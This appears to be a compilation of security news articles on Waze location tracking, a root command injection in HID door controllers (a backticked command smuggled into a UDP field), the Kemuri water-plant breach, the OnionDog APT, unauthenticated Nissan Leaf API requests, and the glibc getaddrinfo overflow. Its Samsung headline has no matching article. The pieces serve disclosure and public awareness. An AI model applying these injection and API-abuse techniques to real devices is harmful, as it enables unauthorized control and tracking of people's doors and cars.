Flaws in Samsung’s ‘Smart’ Home Let Hackers Unlock Doors and Set Off Fire Alarms

samsung-smaerthome.jpg

 

 

 

Credit:   Andy Greenberg, wired

Waze | Another way to track your moves

Millions of drivers use Waze, a Google-owned navigation app, to find the best, fastest route from point A to point B. And according to a new study, all of those people run the risk of having their movements tracked by hackers.

Researchers at the University of California-Santa Barbara recently discovered a Waze vulnerability that allowed them to create thousands of “ghost drivers” that can monitor the drivers around them—an exploit that could be used to track Waze users in real-time. They proved it to me by tracking my own movements around San Francisco and Las Vegas over a three-day period.

“It’s such a massive privacy problem,” said Ben Zhao, professor of computer science at UC-Santa Barbara, who led the research team.

Here’s how the exploit works. Waze’s servers communicate with phones using an SSL encrypted connection, a security precaution meant to ensure that Waze’s computers are really talking to a Waze app on someone’s smartphone. Zhao and his graduate students discovered they could intercept that communication by getting the phone to accept their own computer as a go-between in the connection. Once in between the phone and the Waze servers, they could reverse-engineer the Waze protocol, learning the language that the Waze app uses to talk to Waze’s back-end app servers. With that knowledge in hand, the team was able to write a program that issued commands directly to Waze servers, allowing the researchers to populate the Waze system with thousands of “ghost cars”—cars that could cause a fake traffic jam or, because Waze is a social app where drivers broadcast their locations, monitor all the drivers around them.

 

The attack is similar to one conducted by Israeli university students two years ago, who used emulators to send traffic bots into Waze and create the appearance of a traffic jam. But an emulator, which pretends to be a phone, can only create the appearance of a few vehicles in the Waze system. The UC-Santa Barbara team, on the other hand, could run scripts on a laptop that created thousands of virtual vehicles in the Waze system that can be sent into multiple grids on a map for complete surveillance of a given area.

In a test of the discovery, Zhao and his graduate students tried the hack on a member of their team (with his permission).

“He drove 20 to 30 miles and we were able to track his location almost the whole time,” Zhao told me. “He stopped at gas stations and a hotel.”

 

Last week, I tested the Waze vulnerability myself, to see how successfully the UC-Santa Barbara team could track me over a three-day period. I told them I’d be in Las Vegas and San Francisco, and where I was staying—the kind of information a snoopy stalker might know about someone he or she wanted to track. Then, their ghost army tried to keep tabs on where I went.

Users could be tracked right now and never know it.

– Ben Zhao, UC-Santa Barbara computer science professor
 

The researchers caught my movements on three occasions, including when I took a taxi to downtown Las Vegas for dinner:

And they caught me commuting to work on the bus in San Francisco. (Though they lost me when I went underground to take the subway.)

The security researchers were only able to track me while I was in a vehicle with Waze running in the foreground of my smartphone. Previously, they could track someone even if Waze was just running in the background of the phone. Waze, an Israeli start-up, was purchased by Google in 2013 for $1.1 billion. Zhao informed the security team at Google about the problem and made a version of the paper about their findings public last year. An update to the app in January of this year prevents it from broadcasting your location when the app is running in the background, an update that Waze described as an energy-saving feature. (So update your Waze app if you haven’t done so recently!)

“Waze constantly improves its mechanisms and tools to prevent abuse and misuse. To that end, Waze is regularly in contact with the security and privacy research community—we appreciate their help protecting our users,” said a Waze spokesperson in an emailed statement. “This group of researchers connected with us in 2014, and we have already addressed some of their claims, implementing safeguards in our system to protect the privacy of our users.”

The spokesperson said that “the concept of Waze is that we all work together to share information and impact the world around us” and that “users expect to offer certain information about their route in exchange for unparalleled navigation assistance.” Among the safeguards deployed by Waze is a “system of cloaking” so that a user’s location as displayed “from time to time within the Waze application does not represent such user’s actual, real time location.”


But those safeguards did not prevent real-time tracking in my case. The researchers sent me their tracking minutes after my trips, with accurate time stamps for each of my locations, meaning this cloaking system doesn’t seem to work very well.

“Anyone could be doing this [tracking of Waze users] right now,” said Zhao. “It’s really hard to detect.”

Part of what allowed the researchers to track me so closely is the social nature of Waze and the fact that the app is designed to share users’ geolocation information with each other. The app shows you other Waze drivers on the road around you, along with their usernames and how fast they’re going. (Users can opt of this by going invisible.) When I was in Vegas, the researchers simply populated ghost cars around the hotel I was staying at that were programmed to follow me once I was spotted.

“You could scale up to real-time tracking of millions of users with just a handful of servers,” Zhao told me. “If I wanted to, I could easily crawl all of the U.S. in real time. I have 50-100 servers, and could get more from [Amazon Web Services] and then I could track all of the drivers.”

Theoretically, a hacker could use this technique to go into the Waze system and download the activity of all the drivers using it. If they made the data public like the Ashley Madison hackers did, the public would suddenly have the opportunity to follow the movements of the over 50 million people who use Waze. If you know where someone lives, you would have a good idea of where to start tracking them.

Like the Israeli researchers, Zhao’s team was also able to easily create fake traffic jams. They were wary of interfering with real Waze users so they ran their experiments from 2 a.m. to 5 a.m. every night for two weeks, creating the appearance of heavy traffic and an accident on a remote road outside of Baird, Texas.

“No real humans were harmed or even interacted with,” said Zhao. They aborted the experiment twice after spotting real world drivers within 10 miles of their ghost traffic jam.

 

While Zhao defended the team’s decision to run the experiment live on Waze’s system, he admitted they were “very nervous” about initially making their paper about their findings public. They had approval from their IRB, a university ethics board; took precautions not to interfere with any real users; and notified Google’s security team about their findings They are presenting their paper at a conference called MobiSys, which focuses on mobile systems, at the end of June in Singapore.

 

“We needed to get this information out there,” said Zhao. “Sitting around and not telling the public and the users isn’t an option. They could be tracked right now and never know it.”

“This is bigger than Waze,” continued Zhao. The attack could work against any app, said Zhao, turning their servers into an open system that an attacker can mine and manipulate. With Waze, it’s a particularly sensitive attack because users’ location information is being broadcast and can be downloaded, but the attack on another app would allow hackers to download any information that users broadcast to other users or allow them to flood the app with fake traffic.

“With a [dating app], you could flood an area with your own profile or robot profiles and basically ruin it for your area,” said Zhao. “We looked at a bunch of different apps and nearly all of them had this near-catastrophic vulnerability.”

The scary part, said Zhao, is that “we don’t know how to stop this.” He said that servers that interact with apps in general are not as robust against attack as those that are web-facing.

“Not being able to separate a real device from a program is a larger problem,” said Zhao. “It’s not cheap and it’s not easy to solve. Even if Google wanted to do something, it’s not trivial for them to solve. But I want them to get this on the radar screen and help try to solve the problem. If they lead and they help, this collective problem will be solved much faster than if they don’t.”

“Waze is building their platform to be social so that you can track people around you. By definition this is going to be possible,” said Jonathan Zdziarski, a smartphone forensic scientist, who reviewed the paper at my request. “The crowd sourced tools that are being used in these types of services definitely have these types of data vulnerabilities.”

Zdziarski said there are ways to prevent this kind of abuse, by for example, rate-limiting data requests. Zhao told me his team has been running its experiments since the spring of 2014, and Waze hasn’t blocked them, even though they have created the appearance of thousands of Waze users in a short period of time coming from just a few IP addresses.

Waze’s spokesperson said the company is “examining the new issue raised by the researchers and will continue to take the necessary steps to protect the privacy of our users.”

In the meantime, if you need to use Waze to get around but are wary of being tracked, you do have one option: set your app to invisible mode. But beware, Waze turns off invisible mode every time you restart the app.

Full paper here.

Credit:

Physical Backdoor | Remote Root Vulnerability in HID Door Controllers

If you’ve ever been inside an airport, university campus, hospital, government complex, or office building, you’ve probably seen one of HID’s brand of card readers standing guard over a restricted area. HID is one of the world’s largest manufacturers of access control systems and has become a ubiquitous part of many large companies’ physical security posture. Each one of those card readers is attached to a door controller behind the scenes, which is a device that controls all the functions of the door including locking and unlocking, schedules, alarms, etc.

In recent years, these door controllers have been given network interfaces so that they can be managed remotely. It is very handy for pushing out card database updates and schedules, but as with everything else on the network, there is a risk of remotely exploitable vulnerabilities. And in the case of physical security systems, that risk is more tangible than usual.

HID’s two flagship lines of door controllers are their VertX and Edge platforms. In order for these controllers to be easily integrated into existing access control setups, they have a discoveryd service that responds to a particular UDP packet. A remote management system can broadcast a “discover” probe to port 4070, and all the door controllers on the network will respond with information such as their mac address, device type, firmware version, and even a common name (like “North Exterior Door”). That is the only purpose of this service as far as I can tell. However, it is not the only function of this service. For some reason, discoveryd also contains functionality for changing the blinking pattern of the status LED on the controller. This is accomplished by sending a “command_blink_on” packet to the discoveryd service with the number of times for the LED to blink. Discoveryd then builds up a path to /mnt/apps/bin/blink and calls system() to run the blink program with that number as an argument.

And you can probably guess what comes next.

A command injection vulnerability exists in this function due to a lack of any sanitization on the user-supplied input that is fed to the system() call. Instead of a number of times to blink the LED, if we send a Linux command wrapped in backticks, like `id`, it will get executed by the Linux shell on the device. To make matters worse, the discovery service runs as root, so whatever command we send it will also be run as root, effectively giving us complete control over the device. Since the device in this case is a door controller, having complete control includes all of the alarm and locking functionality. This means that with a few simple UDP packets and no authentication whatsoever, you can permanently unlock any door connected to the controller. And you can do this in a way that makes it impossible for a remote management system to relock it. On top of that, because the discoveryd service responds to broadcast UDP packets, you can do this to every single door on the network at the same time!

Needless to say, this is a potentially devastating bug. The Zero Day Initiative team worked with HID to see that it got fixed, and a patch is reportedly available now through HID’s partner portal, but I have not been able to verify that fix personally. It also remains to be seen just how quickly that patch will trickle down into customer deployments. TippingPoint customers have been protected ahead of a patch for this vulnerability since September 22, 2015 with Digital Vaccine filter 20820.

 

 

Credit:  Ricky Lawshae

Kemuri Water Company (KWC) | Hackers change chemical settings at water treatment plant

The unnamed water district had asked Verizon to assess its networks for indications of a security breach. It said there was no evidence of unauthorized access, and the assessment was a proactive measure as part of ongoing efforts to keep its systems and networks healthy.

Verizon examined the company’s IT systems, which supported end users and corporate functions, as well as Operational Technology (OT) systems, which were behind the distribution, control and metering of the regional water supply.

The assessment found several high-risk vulnerabilities on the Internet-facing perimeter and said that the OT end relied heavily on antiquated computer systems running operating systems from 10 or more years ago.

Many critical IT and OT functions ran on a single IBM AS/400 system which the company described as its SCADA (Supervisory Control and Data Acquisition) platform. This system ran the water district’s valve and flow control application that was responsible for manipulating hundreds of programmable logic controllers (PLCs), and housed customer and billing information, as well as the company’s financials.

Interviews with the IT network team uncovered concerns surrounding recent suspicious cyber activity and it emerged that an unexplained pattern of valve and duct movements had occurred over the previous 60 days. These movements consisted of manipulating the PLCs that managed the amount of chemicals used to treat the water to make it safe to drink, as well as affecting the water flow rate, causing disruptions with water distribution, Verizon reported.

An analysis of the company’s internet traffic showed that some IP addresses previously linked to hacktivist attacks had connected to its online payment application.

Verizon said that it “found a high probability that any unauthorized access on the payment application would also expose sensitive information housed on the AS/400 system.” The investigation later showed that the hackers had exploited an easily identified vulnerability in the payment application, leading to the compromise of customer data. No evidence of fraudulent activity on the stolen accounts could be confirmed.

However, customer information was not the full extent of the breach. The investigation revealed that, using the same credentials found on the payment app webserver, the hackers were able to interface with the water district’s valve and flow control application, also running on the AS/400 system.

During these connections, they managed to manipulate the system to alter the amount of chemicals that went into the water supply and thus interfere with water treatment and production so that the recovery time to replenish water supplies increased. Thanks to alerts, the company was able to quickly identify and reverse the chemical and flow changes, largely minimizing the impact on customers. No clear motive for the attack was found, Verizon noted.

The company has since taken remediation measures to protect its systems.

In its concluding remarks on the incident, Verizon said: “Many issues like outdated systems and missing patches contributed to the data breach — the lack of isolation of critical assets, weak authentication mechanisms and unsafe practices of protecting passwords also enabled the threat actors to gain far more access than should have been possible.”

Acknowledging that the company’s alert functionality played a key role in detecting the chemical and flow changes, Verizon said that implementation of a “layered defense-in-depth strategy” could have detected the attack earlier, limiting its success or preventing it altogether.

 

About the attack [UPDATED]

A “hacktivist” group with ties to Syria compromised Kemuri Water Company’s computers after exploiting unpatched web vulnerabilities in its internet-facing customer payment portal, it is reported.

The hack – which involved SQL injection and phishing – exposed KWC’s ageing AS/400-based operational control system because login credentials for the AS/400 were stored on the front-end web server. This system, which was connected to the internet, managed programmable logic controllers (PLCs) that regulated valves and ducts that controlled the flow of water and chemicals used to treat it through the system. Many critical IT and operational technology functions ran on a single AS400 system, a team of computer forensic experts from Verizon subsequently concluded.

Our endpoint forensic analysis revealed a linkage with the recent pattern of unauthorised crossover. Using the same credentials found on the payment app webserver, the threat actors were able to interface with the water district’s valve and flow control application, also running on the AS400 system. We also discovered four separate connections over a 60-day period, leading right up to our assessment.During these connections, the threat actors modified application settings with little apparent knowledge of how the flow control system worked. In at least two instances, they managed to manipulate the system to alter the amount of chemicals that went into the water supply and thus handicap water treatment and production capabilities so that the recovery time to replenish water supplies increased. Fortunately, based on alert functionality, KWC was able to quickly identify and reverse the chemical and flow changes, largely minimising the impact on customers. No clear motive for the attack was found.

Verizon’s RISK Team uncovered evidence that the hacktivists had manipulated the valves controlling the flow of chemicals twice – though fortunately to no particular effect. It seems the activists lacked either the knowledge of SCADA systems or the intent to do any harm.

The same hack also resulted in the exposure of personal information of the utility’s 2.5 million customers. There’s no evidence that this has been monetized or used to commit fraud.

Nonetheless, the whole incident highlights the weaknesses in securing critical infrastructure systems, which often rely on ageing or hopelessly insecure setups.

 

KWC

 

More Information

Monzy Merza, Splunk’s director of cyber research and chief security evangelist, commented: “Dedicated and opportunistic attackers will continue to exploit low-hanging fruit present in outdated or unpatched systems. We continue to see infrastructure systems being targeted because they are generally under-resourced or believed to be out of band or not connected to the internet.”

“Beyond the clear need to invest in intrusion detection, prevention, patch management and analytics-driven security measures, this breach underscores the importance of actionable intelligence. Reports like Verizon’s are important sources of insight. Organisations must leverage this information to collectively raise the bar in security to better detect, prevent and respond to advanced attacks. Working collectively is our best route to getting ahead of attackers,” he added.

Reports that hackers have breached water treatment plants are rare but not unprecedented. For example, computer screenshots posted online back in November 2011 purported to show the user interface used to monitor and control equipment at the Water and Sewer Department for the City of South Houston, Texas by hackers who claimed to have pwned its systems. The claim followed attempts by the US Department of Homeland Security to dismiss a separate water utility hack claim days earlier.

More recently hackers caused “serious damage” after breaching a German steel mill and wrecking one of its blast furnaces, according to a German government agency. Hackers got into production systems after tricking victims with spear phishing emails, said the agency.

Spear phishing also seems to have played a role in attacks lining the BlackEnergy malware against power utilities in the Ukraine and other targets last December. The malware was used to steal user credentials as part of a complex attack that resulted in power outages that ultimately left more than 200,000 people temporarily without power on 23 December.

 

Credit:  watertechonline, theregister

OnionDog APT targets Critical Infrastructures and Industrial Control Systems (ICS)

The Helios Team at 360 SkyEye Labs revealed that a group named OnionDog has been infiltrating and stealing information from the energy, transportation and other infrastructure industries of Korean-language countries through the Internet.

OnionDog

OnionDog’s first activity can be traced back to October, 2013 and in the following two years it was only active between late July and early September. The self-set life cycle of a Trojan attack is 15 days on average and is distinctly organizational and objective-oriented.

OnionDog malware is transmitted by taking advantage of the vulnerability of the popular office software Hangul in Korean-language countries, and it attacked network-isolated targets through a USB worm.

Targeting the infrastructure industry

OnionDog concentrated its efforts on infrastructure industries in Korean-language countries. In 2015 this organization mainly attacked harbors, VTS, subways, public transportation and other transportation systems. In 2014 it attacked many electric power and water resources corporations as well as other energy enterprises.

The Helios Team has found 96 groups of malicious code, 14 C&C domain names and IP related to OnionDog. It first surfaced in October 2013, and then was most active in the summers of the following years. The Trojan set its own “active state” time and the shortest was be three days and maximum twenty nine days, from compilation to the end of activity. The average life cycle is 15 days, which makes it more difficult for the victim enterprises to notice and take actions than those active for longer period of time.

OnionDog’s attacks are mainly carried out in the form of spear phishing emails. The early Trojan used icons and file numbers to create a fake HWP file (Hangul’s file format). Later on, the Trojan used a vulnerability in an upgraded version of Hangul, which imbeds malicious code in a real HWP file. Once the file is opened, the vulnerability will be triggered to download and activate the Trojan.

Since most infrastructure industries, such as the energy industry, generally adopt intranet isolation measures, OnionDog uses the USB disk drive ferry to break the false sense of security of physical isolation. In the classic APT case of the Stuxnet virus, which broke into an Iranian nuclear power plant, the virus used an employee’s USB disk to circumvent network isolation. OnionDog also used this channel and generated USB worms to infiltrate the target internal network.

“OCD-type” intensive organization

In the Malicious Code activities of OnionDog, there are strict regulations:

First, the Malicious Code has strict naming rules starting from the path of created PDB (symbol file). For example, the path for USB worm is APT-USB, and the path for spear mail file is APT-WebServer;

When the OnionDog Trojan is successfully released, it will communicate to a C&C (Trojan server), download other malware and save them in the %temp% folder and use “XXX_YYY.jpg” uniformly as the file name. These names have their special meaning and usually point to the target.

All signs show that OnionDog has strict organization and arrangement across its attack time, target, vulnerability exploration and utilization, and malicious code. At the same time, it is very cautious about covering up its tracks.

In 2014, OnionDog used many fixed IPs in South Korea as its C&C sites. Of course, this does not mean that the attacker is located in South Korea. These IPs could be used as puppets and jumping boards. By 2015, OnionDog website communications were upgraded to Onion City across the board. This is so far a relatively more advanced and covert method of network communication among APT attacks.

Onion City means that the deep web searching engine uses Tor2web agent technology to visit the anonymous Tor network deeply without using the Onion Brower specifically. And OnionDog uses the Onion City to hide the Trojan-controlling server in the Tor network.

In recent years, APT attacks on infrastructure facilities and large-scale enterprises have frequently emerged. Some that attack an industrial control system, such as Stuxnet, Black Energy and so on, can have devastating results. Some attacks are for the purpose of stealing information, such as the Lazarus hacker organization jointly revealed by Kaspersky, AlienVault lab and Novetta, and OnionDog which was recently exposed by the 360 Helios team. These secret cybercrimes can cause similarly serious losses as well.

 

 

Credit:  helpnetsecurity

[CRITICAL] Nissan Leaf Can Be Hacked Via Web Browser From Anywhere In The World

How The Nissan Leaf Can Be Hacked Via Web Browser From Anywhere In The World

What if a car could be controlled from a computer halfway around the world? Computer security researcher and hacker Troy Hunt has managed to do just that, via a web browser and an Internet connection, with an unmodified Nissan Leaf in another country. While so far the control was limited to the HVAC system, it’s a revealing demonstration of what’s possible.

Hunt writes that his experiment started when an attendee at a developer security conference where Hunt was presenting realized that his car, a Nissan Leaf, could be accessed via the internet using Nissan’s phone app. Using the same methods as the app itself, any other Nissan Leaf could be controlled as well, from pretty much anywhere.

Hunt made contact with another security researcher and Leaf-owner, Scott Helme. Helme is based in the UK, and Hunt is based in Australia, so they arranged an experiment that would involve Hunt controlling Helme’s LEAF from halfway across the world. Here’s the video they produced of that experiment:

As you can see, Hunt was able to access the Leaf in the UK, which wasn’t even on, and gather extensive data from the car’s computer about recent trips, distances of those trips (recorded, oddly, in yards) power usage information, charge state, and so on. He was also able to access the HVAC system to turn on the heater or A/C, and to turn on the heated seats.

It makes sense these functions would be the most readily available, because those are essentially the set of things possible via Nissan’s Leaf mobile app, which people use to heat up or cool their cars before they get to them, remotely check on the state of charge, and so on.

This app is the key to how the Leaf can be accessed via the web, since that’s exactly what the app does. The original (and anonymous) researcher found that by making his computer a proxy between the app and the internet, the requests made from the app to Nissan’s servers can be seen. Here’s what a request looks like:

GET https://[redacted].com/orchestration_1111/gdc/BatteryStatusRecordsRequest.php?RegionCode=NE&lg=no-NO&DCMID=&VIN=SJNFAAZE0U60XXXXX&tz=Europe/Paris&TimeFrom=2014-09-27T09:15:21

If you look in that code, you can see that part of the request includes a tag for VIN, which is the Vehicle Identification Number (obfuscated here) of the car. Changing this VIN is really all you need to do to access any particular Leaf. Remember, VIN are visible through the windshield of every car, by law.

Hunt describes the process on his site, and notes some alarming details:

This is pretty self-explanatory if you read through the response; we’re seeing the battery status of his LEAF. But what got Jan’s attention is not that he could get the vehicle’s present status, but rather that the request his phone had issued didn’t appear to contain any identity data about his authenticated session.

In other words, he was accessing the API anonymously. It’s a GET request so there was nothing passed in the body nor was there anything like a bearer token in the request header. In fact, the only thing identifying his vehicle was the VIN which I’ve partially obfuscated in the URL above.

So, there’s no real security here to prevent accessing data on a LEAF, nor any attempt to verify the identity on either end of the connection.

How The Nissan Leaf Can Be Hacked Via Web Browser From Anywhere In The World

And it gets worse. Here, quoting from Hunt’s site, he’s using the name “Jan” to refer to the anonymous Leaf-owning hacker who discovered this:

But then he tried turning it on and observed this request:

GET https://[redacted].com/orchestration_1111/gdc/ACRemoteRequest.php?RegionCode=NE&lg=no-NO&DCMID=&VIN=SJNFAAZE0U60XXXXX&tz=Europe/Paris

That request returned this response:

{

status:200

message: “success”,

userId: “******”,

vin: “SJNFAAZE0U60****”,

resultKey: “***************************”

}

This time, personal information about Jan was returned, namely his user ID which was a variation of his actual name. The VIN passed in the request also came back in the response and a result key was returned.

He then turned the climate control off and watched as the app issued this request:

GET https://[redacted].com/orchestration_1111/gdc/ACRemoteOffRequest.php?RegionCode=NE&lg=no-NO&DCMID=&VIN=SJNFAAZE0U60XXXXX&tz=Europe/Paris

All of these requests were made without an auth token of any kind; they were issued anonymously. Jan checked them by loading them up in Chrome as well and sure enough, the response was returned just fine. By now, it was pretty clear the API had absolutely zero access controls but the potential for invoking it under the identity of other vehicles wasn’t yet clear.

Even if you don’t understand the code, here’s what all that means: we have the ability to get personal data and control functions of the car from pretty much anywhere with a web connection, as long as you know the target car’s VIN.

Hunt proved this was possible after some work, using a tool to generate Leaf VINs (only the last 5 or 6 digits are actually different) and sending a request for battery status to those VINs. Soon, they got the proper response back. Hunt explains the significance:

This wasn’t Jan’s car; it was someone else’s LEAF. Our suspicion that the VIN was the only identifier required was confirmed and it became clear that there was a complete lack of auth on the service.

Of course it’s not just an issue related to retrieving vehicle status, remember the other APIs that can turn the climate control on or off. Anyone could potentially enumerate VINs and control the physical function of any vehicles that responded. That’s was a very serious issue. I reported it to Nissan the day after we discovered this (I wanted Jan to provide me with more information first), yet as of today – 32 days later – the issue remains unresolved. You can read the disclosure timeline further down but certainly there were many messages and a phone call over a period of more than four weeks and it’s only now that I’m disclosing publicly…

How The Nissan Leaf Can Be Hacked Via Web Browser From Anywhere In The World

(Now, just to be clear, this is not a how-to guide to mess with someone’s Leaf. You’ll note that the crucial server address has been redacted, so you can’t just type in those little segments of code and expect things to work.)

While at the moment, you can only control some HVAC functions and get access to the car’s charge state and driving history, that’s actually more worrying than you may initially think.

Not only is there the huge privacy issue of having your comings-and-goings logged and available, but if someone wanted to, they could crank the AC and drain the battery of a Leaf without too much trouble, stranding the owner somewhere.

There’s no provision for remote starting or unlocking at this point, but the Leaf is a fully drive-by-wire vehicle. It’s no coincidence that every fully autonomous car I’ve been in that’s made by Nissan has been on the LEAF platform; all of its major controls can be accessed electronically. For example, the steering wheel can be controlled (and was controlled, as I saw when visiting Nissan’s test facility) by the motors used for power steering assist, and it’s throttle (well, for electrons)-by-wire, and so on.

So, at this moment I don’t think anyone’s Leaf is in any danger other than having a drained battery and an interior like a refrigerator, but that’s not to say nothing else will be figured out. This is a huge security breach that Nissan needs to address as soon as possible. (I reached out to Nissan for comment on this story and will update as soon as I get one.)

So far, Nissan has not fixed this after at least 32 days, Hunt said. Here’s how he summarized his contact with Nissan:

I made multiple attempts over more than a month to get Nissan to resolve this and it was only after the Canadian email and French forum posts came to light that I eventually advised them I’d be publishing this post. Here’s the timeline (dates are Australian Eastern Standard time):

  • 23 Jan: Full details of the findings sent and acknowledged by Nissan Information Security Threat Intelligence in the U.S.A.
  • 30 Jan: Phone call with Nissan to fully explain how the risk was discovered and the potential ramifications followed up by an email with further details
  • 12 Feb: Sent an email to ask about progress and offer further support to which I was advised “We’re making progress toward a solution”
  • 20 Feb: Sent details as provided by the Canadian owner (including a link to the discussion of the risk in the public forum) and advised I’d be publishing this blog post “later next week”
  • 24 Feb: This blog published, 4 weeks and 4 days after first disclosure

All in all, I sent ten emails (there was some to-and-fro) and had one phone call. This morning I did hear back with a request to wait “a few weeks” before publishing, but given the extensive online discussions in public forums and the more than one-month lead time there’d already been, I advised I’d be publishing later that night and have not heard back since. I also invited Nissan to make any comments they’d like to include in this post when I contacted them on 20 Feb or provide any feedback on why they might not consider this a risk. However, there was nothing to that effect when I heard back from them earlier today, but I’ll gladly add an update later on if they’d like to contribute.

I do want to make it clear though that especially in the earlier discussions, Nissan handled this really well. It was easy to get in touch with the right people quickly and they made the time to talk and understand the issue. They were receptive and whilst I obviously would have liked to see this rectified quickly, compared to most ethical disclosure experiences security researches have, Nissan was exemplary.

It’s great Nissan was “exemplary” but it would have been even better if they’d implemented at least some basic security before making their cars’ data and controls available over the internet.

How The Nissan Leaf Can Be Hacked Via Web Browser From Anywhere In The World

Security via obscurity just isn’t going to cut it anymore, as Troy Hunt has proven through his careful and methodical work. I’m not sure why carmakers don’t seem to be taking this sort of security seriously, but it’s time for them to step up.

After all, doing so will save them from PR headaches like this, and the likely forthcoming stories your aunt will Facebook you about how the terrorists are going to make all the Leafs hunt us down like dogs.

Until they have to recharge, at least.

(Thanks, Matt and Brandon!)

 

 

Credit:  Jason Torchinsky

[CRITICAL] CVE-2015-7547: glibc getaddrinfo stack-based buffer overflow

Have you ever been deep in the mines of debugging and suddenly realized that you were staring at something far more interesting than you were expecting? You are not alone! Recently a Google engineer noticed that their SSH client segfaulted every time they tried to connect to a specific host. That engineer filed a ticket to investigate the behavior and after an intense investigation we discovered the issue lay in glibc and not in SSH as we were expecting. Thanks to this engineer’s keen observation, we were able determine that the issue could result in remote code execution. We immediately began an in-depth analysis of the issue to determine whether it could be exploited, and possible fixes. We saw this as a challenge, and after some intense hacking sessions, we were able to craft a full working exploit!

In the course of our investigation, and to our surprise, we learned that the glibc maintainers had previously been alerted of the issue via their bug tracker in July, 2015. (bug). We couldn’t immediately tell whether the bug fix was underway, so we worked hard to make sure we understood the issue and then reached out to the glibc maintainers. To our delight, Florian Weimer and Carlos O’Donell of Red Hat had also been studying the bug’s impact, albeit completely independently! Due to the sensitive nature of the issue, the investigation, patch creation, and regression tests performed primarily by Florian and Carlos had continued “off-bug.”

This was an amazing coincidence, and thanks to their hard work and cooperation, we were able to translate both teams’ knowledge into a comprehensive patch and regression test to protect glibc users.

That patch is available here.

 

Issue Summary:

Our initial investigations showed that the issue affected all the versions of glibc since 2.9. You should definitely update if you are on an older version though. If the vulnerability is detected, machine owners may wish to take steps to mitigate the risk of an attack. The glibc DNS client side resolver is vulnerable to a stack-based buffer overflow when the getaddrinfo() library function is used. Software using this function may be exploited with attacker-controlled domain names, attacker-controlled DNS servers, or through a man-in-the-middle attack. Google has found some mitigations that may help prevent exploitation if you are not able to immediately patch your instance of glibc. The vulnerability relies on an oversized (2048+ bytes) UDP or TCP response, which is followed by another response that will overwrite the stack. Our suggested mitigation is to limit the response (i.e., via DNSMasq or similar programs) sizes accepted by the DNS resolver locally as well as to ensure that DNS queries are sent only to DNS servers which limit the response size for UDP responses with the truncation bit set.

 

Technical information:

glibc reserves 2048 bytes in the stack through alloca() for the DNS answer at _nss_dns_gethostbyname4_r() for hosting responses to a DNS query. Later on, at send_dg() and send_vc(), if the response is larger than 2048 bytes, a new buffer is allocated from the heap and all the information (buffer pointer, new buffer size and response size) is updated. Under certain conditions a mismatch between the stack buffer and the new heap allocation will happen. The final effect is that the stack buffer will be used to store the DNS response, even though the response is larger than the stack buffer and a heap buffer was allocated. This behavior leads to the stack buffer overflow. The vectors to trigger this buffer overflow are very common and can include ssh, sudo, and curl. We are confident that the exploitation vectors are diverse and widespread; we have not attempted to enumerate these vectors further.

Exploitation:

Remote code execution is possible, but not straightforward. It requires bypassing the security mitigations present on the system, such as ASLR. We will not release our exploit code, but a non-weaponized Proof of Concept has been made available simultaneously with this blog post. With this Proof of Concept, you can verify if you are affected by this issue, and verify any mitigations you may wish to enact. As you can see in the below debugging session we are able to reliably control EIP/RIP.

(gdb) x/i $rip => 0x7fe156f0ccce <_nss_dns_gethostbyname4_r+398>: req (gdb) x/a $rsp 0x7fff56fd8a48: 0x4242424242424242 0x4242424242420042

When code crashes unexpectedly, it can be a sign of something much more significant than it appears; ignore crashes at your peril! Failed exploit indicators, due to ASLR, can range from:

  • Crash on free(ptr) where ptr is controlled by the attacker.
  • Crash on free(ptr) where ptr is semi-controlled by the attacker since ptr has to be a valid readable address.
  • Crash reading from memory pointed by a local overwritten variable.
  • Crash writing to memory on an attacker-controlled pointer.

We would like to thank Neel Mehta, Thomas Garnier, Gynvael Coldwind, Michael Schaller, Tom Payne, Michael Haro, Damian Menscher, Matt Brown, Yunhong Gu, Florian Weimer, Carlos O’Donell and the rest of the glibc team for their help figuring out all details about this bug, exploitation, and patch development.

 

 

Credit:  Fermin J. Serna and Kevin Stadmeyer